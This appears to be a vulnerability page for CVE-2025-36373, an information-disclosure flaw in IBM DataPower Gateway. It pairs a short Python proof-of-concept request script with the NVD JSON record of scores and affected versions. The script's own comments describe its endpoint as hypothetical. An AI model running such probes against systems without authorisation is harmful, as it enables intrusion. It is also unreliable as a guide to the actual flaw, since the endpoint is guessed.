CVE-2025-36373

import requests # Conceptual Proof of Concept for CVE-2025-36373 # Target: IBM DataPower Gateway # Precondition: Attacker has High Privilege (Admin) credentials def check_info_disclosure(target_host, username, password): """ Attempts to access cross-domain status information. """ # Example endpoint that might leak info across domains in vulnerable versions # This is a hypothetical endpoint based on the vulnerability description. url = f"https://{target_host}/mgmt/status/default" headers = { "Accept": "application/json", "X-Transaction-ID": "poc-test" } try: response = requests.get(url, headers=headers, auth=(username, password), verify=False, timeout=10) if response.status_code == 200: print("[!] Potential Info Disclosure: Request succeeded.") print("[*] Response Data:", response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[Error] An exception occurred: {e}") if __name__ == "__main__": # Replace with actual target details check_info_disclosure("192.168.1.100", "admin", "pass123")

{"cve": {"id": "CVE-2025-36373", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:16:57.897", "lastModified": "2026-04-06T16:50:00.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM DataPower Gateway 10.6CD 10.6.1.0 through 10.6.5.0 and IBM DataPower Gateway 10.5.0 10.5.0.0 through 10.5.0.20 and IBM DataPower Gateway 10.6.0 10.6.0.0 through 10.6.0.8 IBM DataPower Gateway could disclose sensitive system information from other domains to an administrative user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.5.0.21", "matchCriteriaId": "CE32BDC7-B268-4779-A283-F94DCF1433D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.6.0.0", "versionEndExcluding": "10.6.0.9", "matchCriteriaId": "9036053D-6E1A-4B2F-ACCA-5E3F4443F73E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:continuous_delivery:*:*:*", "versionStartIncluding": "10.6.1.0", "versionEndExcluding": "10.6.6.0", "matchCriteriaId": "E75118C5-5C01-404E-B857-56B9D6CA2119"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267833", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}